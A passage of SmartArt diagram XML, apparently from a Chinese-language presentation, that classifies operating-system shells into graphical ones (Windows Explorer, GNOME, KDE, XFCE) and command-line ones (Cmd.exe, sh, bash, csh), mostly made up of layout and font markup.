      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D8CE7451-2059-4886-A353-78DA7AEFF427}" type="pres">
      <dgm:prSet presAssocID="{AE2A9B7F-CBE5-40C0-A647-6589AD013AFF}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F3747440-D36A-4CA3-B28B-85A9CB8A378E}" type="pres">
      <dgm:prSet presAssocID="{AE2A9B7F-CBE5-40C0-A647-6589AD013AFF}" presName="parTx" presStyleLbl="alignNode1" presStyleIdx="0" presStyleCnt="1" custLinFactNeighborY="-9926">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{03EC1CA3-4A51-41EA-8F7F-660924ECE996}" type="pres">
      <dgm:prSet presAssocID="{AE2A9B7F-CBE5-40C0-A647-6589AD013AFF}" presName="desTx" presStyleLbl="alignAccFollowNode1" presStyleIdx="0" presStyleCnt="1">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{66FFB764-F1AE-4389-B444-4BADBBD4E8EB}" type="presOf" srcId="{AC768BFB-1B06-4ACA-82EC-0D5017F4E237}" destId="{03EC1CA3-4A51-41EA-8F7F-660924ECE996}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{BFAB49A1-5648-4280-8191-375D1107EC09}" srcId="{AE2A9B7F-CBE5-40C0-A647-6589AD013AFF}" destId="{85628946-7BD9-496D-AAE6-E1A67A4E43AB}" srcOrd="2" destOrd="0" parTransId="{C14F7AC2-2C30-4292-9D77-0544F2B17F63}" sibTransId="{F5AAEAAB-99E1-4AB3-A5A2-90FFBB54A299}"/>
    <dgm:cxn modelId="{1FC770A0-D42E-4FE1-B0CB-082F6F43BA69}" type="presOf" srcId="{4F9971D7-4FF9-4192-9CD5-F6D38C048B6A}" destId="{03EC1CA3-4A51-41EA-8F7F-660924ECE996}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{3E727940-147D-44B3-AE81-5BB65DEACF5F}" srcId="{A1876731-3F55-4C26-9CB2-A8556FB193FD}" destId="{AE2A9B7F-CBE5-40C0-A647-6589AD013AFF}" srcOrd="0" destOrd="0" parTransId="{5FDA3FE6-4A89-4FE8-AE56-4D0A519F1DB1}" sibTransId="{6D744F90-5821-40C4-B6A3-B7B8B771FC6A}"/>
    <dgm:cxn modelId="{87D0CF88-956B-4064-9976-13C37257E57F}" srcId="{AE2A9B7F-CBE5-40C0-A647-6589AD013AFF}" destId="{4F9971D7-4FF9-4192-9CD5-F6D38C048B6A}" srcOrd="3" destOrd="0" parTransId="{20116F1A-AF6C-4319-92DA-43302A14792A}" sibTransId="{BE668C63-C2F5-4906-9447-0C268EA7D0E1}"/>
    <dgm:cxn modelId="{79EFEBBB-4F80-4AFF-97AC-D324898470B9}" srcId="{AE2A9B7F-CBE5-40C0-A647-6589AD013AFF}" destId="{3D64DB01-DB6E-4C53-92FD-2D27FACA4C13}" srcOrd="1" destOrd="0" parTransId="{F6631582-D859-4E35-B75E-5C163A6E2B2C}" sibTransId="{F5BBAD73-09A7-4124-9BE6-D6F8FC2B4C68}"/>
    <dgm:cxn modelId="{85EE0C33-E4C9-418F-B9E8-C6E016355EE4}" type="presOf" srcId="{A1876731-3F55-4C26-9CB2-A8556FB193FD}" destId="{98537314-D225-4A7F-95F5-263A5E07C2F0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{B01E7754-6BD4-4DA4-AE68-B46F269C158A}" type="presOf" srcId="{3D64DB01-DB6E-4C53-92FD-2D27FACA4C13}" destId="{03EC1CA3-4A51-41EA-8F7F-660924ECE996}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{2A91C637-6D79-4180-B9E6-C86286E94B70}" type="presOf" srcId="{AE2A9B7F-CBE5-40C0-A647-6589AD013AFF}" destId="{F3747440-D36A-4CA3-B28B-85A9CB8A378E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{799BD689-8BEE-4AA1-A813-7772AF1638C0}" srcId="{AE2A9B7F-CBE5-40C0-A647-6589AD013AFF}" destId="{AC768BFB-1B06-4ACA-82EC-0D5017F4E237}" srcOrd="0" destOrd="0" parTransId="{8CB6C615-84E2-4649-A12B-44334139509D}" sibTransId="{40793C0F-08C2-44DD-AD33-60811B306629}"/>
    <dgm:cxn modelId="{E23F5890-6F32-44E1-A9E1-50264186773F}" type="presOf" srcId="{85628946-7BD9-496D-AAE6-E1A67A4E43AB}" destId="{03EC1CA3-4A51-41EA-8F7F-660924ECE996}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{A29E51B7-A271-4451-A78B-123E094768B9}" type="presParOf" srcId="{98537314-D225-4A7F-95F5-263A5E07C2F0}" destId="{D8CE7451-2059-4886-A353-78DA7AEFF427}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{B5262C5B-4068-41B2-A810-B972477EDAE7}" type="presParOf" srcId="{D8CE7451-2059-4886-A353-78DA7AEFF427}" destId="{F3747440-D36A-4CA3-B28B-85A9CB8A378E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{9DEB3A08-A362-4366-9B35-BAB0C791383D}" type="presParOf" srcId="{D8CE7451-2059-4886-A353-78DA7AEFF427}" destId="{03EC1CA3-4A51-41EA-8F7F-660924ECE99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E8812-6162-42BA-8D7E-4E887975D3FF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="621"/>
          <a:ext cx="8229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6A50C8-3CFC-4B73-8301-88CE47E78D84}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="621"/>
          <a:ext cx="8229600" cy="1017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066800" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="0" kern="1200" dirty="0" smtClean="0">
            <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            <a:ea typeface="+mj-ea"/>
            <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr lvl="0" algn="ctr" defTabSz="1066800" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" sz="2400" b="0" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>图形</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" sz="2400" b="0" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>界面</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="0" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>Shell</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" sz="2400" b="0" kern="1200" dirty="0">
            <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            <a:ea typeface="+mj-ea"/>
            <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="621"/>
        <a:ext cx="8229600" cy="1017775"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{9E7CE51E-7DCC-4EE0-BAB8-236363B6659C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1018396"/>
          <a:ext cx="8229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2199C-AE34-4147-8323-E37812406FCB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1018396"/>
          <a:ext cx="1645920" cy="1017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zh-CN" sz="1400" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>（</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>Graphical User Interface shell </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" sz="1400" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>即 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>GUI shell</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" sz="1400" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>）</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" sz="1400" kern="1200" dirty="0">
            <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            <a:ea typeface="+mj-ea"/>
            <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="1018396"/>
        <a:ext cx="1645920" cy="1017775"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6B8F2557-19AB-41D3-992D-C75539ABF515}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1769363" y="1042052"/>
          <a:ext cx="3168396" cy="47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latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>Windows Explorer </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" sz="1400" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>（微软的</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>windows</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" sz="1400" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>系列操作系统）</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" sz="1400" kern="1200" dirty="0">
            <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            <a:ea typeface="+mj-ea"/>
            <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1769363" y="1042052"/>
        <a:ext cx="3168396" cy="473106"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{CECA3A8C-D1DA-4FB5-8FD4-24A1A07A3072}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1645919" y="1515158"/>
          <a:ext cx="65836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D9D2DD-3724-4DD9-B725-E0622440FAD8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1769363" y="1538814"/>
          <a:ext cx="3168396" cy="47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smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>(Linux Shell)  </a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" sz="1400" kern="1200" dirty="0">
            <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            <a:ea typeface="+mj-ea"/>
            <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1769363" y="1538814"/>
        <a:ext cx="3168396" cy="473106"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{90D7060A-F687-4BF7-A16C-32071EE2DD49}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5061204" y="1538814"/>
          <a:ext cx="3168396" cy="47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latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>X Window Manager (GNOME, KDE,XFCE)</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" sz="1600" kern="1200">
            <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            <a:ea typeface="+mj-ea"/>
            <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5061204" y="1538814"/>
        <a:ext cx="3168396" cy="473106"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{AEB809B1-F8AB-41BB-9664-0788EA2F1808}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1645919" y="2011920"/>
          <a:ext cx="65836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B82FD1-89AA-4EF3-B822-AEB1D925C047}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2036172"/>
          <a:ext cx="8229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70C28D-9060-4008-A39A-E92124B7B5DE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2036172"/>
          <a:ext cx="8229600" cy="1017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066800" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="0" kern="1200" dirty="0" smtClean="0">
            <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            <a:ea typeface="+mj-ea"/>
            <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr lvl="0" algn="ctr" defTabSz="1066800" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" sz="2400" b="0" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>命令行</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" sz="2400" b="0" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>式</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="0" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>Shell</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" sz="2400" b="0" kern="1200" dirty="0">
            <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            <a:ea typeface="+mj-ea"/>
            <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="2036172"/>
        <a:ext cx="8229600" cy="1017775"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{28F07FF1-BC0A-4B11-A1C0-AD22F56E6834}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3053947"/>
          <a:ext cx="8229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C35FAB-DD1C-416A-B961-E7A26F98464A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3053947"/>
          <a:ext cx="1645920" cy="1017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zh-CN" sz="1400" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>（</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>Command Line Interface shell </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" sz="1400" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>，即</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>CLI shell</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" sz="1400" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>）</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" sz="1400" kern="1200" dirty="0">
            <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            <a:ea typeface="+mj-ea"/>
            <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="3053947"/>
        <a:ext cx="1645920" cy="1017775"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E0C26873-E511-49D3-96E0-CFF55CFE152A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1769363" y="3065912"/>
          <a:ext cx="3168396" cy="239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smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>Cmd.exe (MSDOS)</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" sz="1400" kern="1200">
            <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            <a:ea typeface="+mj-ea"/>
            <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1769363" y="3065912"/>
        <a:ext cx="3168396" cy="239286"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C8594BF4-B759-43DF-A0FF-AC914ADACDA8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1645919" y="3305198"/>
          <a:ext cx="65836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199093-DF47-4E75-B3B0-39E4D5EB791C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1769363" y="3317162"/>
          <a:ext cx="3168396" cy="239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smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>Sh (Bourne shell)</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" sz="1400" kern="1200">
            <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            <a:ea typeface="+mj-ea"/>
            <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1769363" y="3317162"/>
        <a:ext cx="3168396" cy="239286"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1EBFBE3D-4833-4CE4-B5A0-BA5E7F977860}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1645919" y="3556449"/>
          <a:ext cx="65836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62E2C5-8471-47D4-8DC8-317AC2C7F649}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1769363" y="3568413"/>
          <a:ext cx="3168396" cy="239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latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>Bash (Bourne again shell)</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" sz="1400" kern="1200" dirty="0">
            <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            <a:ea typeface="+mj-ea"/>
            <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1769363" y="3568413"/>
        <a:ext cx="3168396" cy="239286"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{62A1DC37-D779-4E17-AA87-9913F554A654}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1645919" y="3807700"/>
          <a:ext cx="65836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1EFDBB-41E9-4F04-9ADE-8419FD0DEF7B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1769363" y="3819664"/>
          <a:ext cx="3168396" cy="239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err="1" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>Csh</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t> (C Shell)</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" sz="1400" kern="1200" dirty="0">
            <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            <a:ea typeface="+mj-ea"/>
            <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1769363" y="3819664"/>
        <a:ext cx="3168396" cy="239286"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{25C26285-D126-43D1-B6A3-F19E9B631DE7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1645919" y="4058951"/>
          <a:ext cx="65836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1D0254-F1CD-4F12-BD16-7AEDF646C3A6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="4071723"/>
          <a:ext cx="8229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C019A3-1DA8-4D09-8ED7-92723E8C1B00}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="4071723"/>
          <a:ext cx="8229600" cy="1017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endParaRPr lang="en-US" altLang="zh-CN" sz="1400" kern="1200" dirty="0" smtClean="0">
            <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            <a:ea typeface="+mj-ea"/>
            <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr lvl="0" algn="l" defTabSz="622300" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" sz="2000" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>传统意义上的</a:t>
          </a:r>
          <a:r>
